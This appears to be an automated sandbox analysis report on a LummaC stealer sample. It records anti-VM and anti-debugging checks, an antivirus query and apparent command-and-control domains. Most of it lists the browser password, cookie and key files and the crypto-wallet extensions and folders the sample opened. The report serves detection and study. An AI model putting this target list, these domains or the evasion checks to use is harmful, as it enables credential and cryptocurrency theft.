              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeAPI call chain: ExitProcess graph end nodegraph_0-39585
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_03208120 LdrInitializeThunk,0_2_03208120
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063B365 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_0063B365
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063B365 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_0063B365
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D904C7 mov edx, dword ptr fs:[00000030h]0_2_02D904C7
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D90A87 mov eax, dword ptr fs:[00000030h]0_2_02D90A87
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D910D7 mov eax, dword ptr fs:[00000030h]0_2_02D910D7
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D910D6 mov eax, dword ptr fs:[00000030h]0_2_02D910D6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D90E37 mov eax, dword ptr fs:[00000030h]0_2_02D90E37
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00633A58 GetProcessHeap,0_2_00633A58
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00633576 SetUnhandledExceptionFilter,0_2_00633576
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063359E SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0063359E

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: 6RVmzn1DzL.exeString found in binary or memory: potterryisiw.shop
              Source: 6RVmzn1DzL.exeString found in binary or memory: foodypannyjsud.shop
              Source: 6RVmzn1DzL.exeString found in binary or memory: contintnetksows.shop
              Source: 6RVmzn1DzL.exeString found in binary or memory: penetratedpoopp.xyz
              Source: 6RVmzn1DzL.exeString found in binary or memory: ellaboratepwsz.xyz
              Source: 6RVmzn1DzL.exeString found in binary or memory: swellfrrgwwos.xyz
              Source: 6RVmzn1DzL.exeString found in binary or memory: towerxxuytwi.xyz
              Source: 6RVmzn1DzL.exeString found in binary or memory: pedestriankodwu.xyz
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006342BA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006342BA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00638694 __lock,____lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00638694
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\ElectronCash\\=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
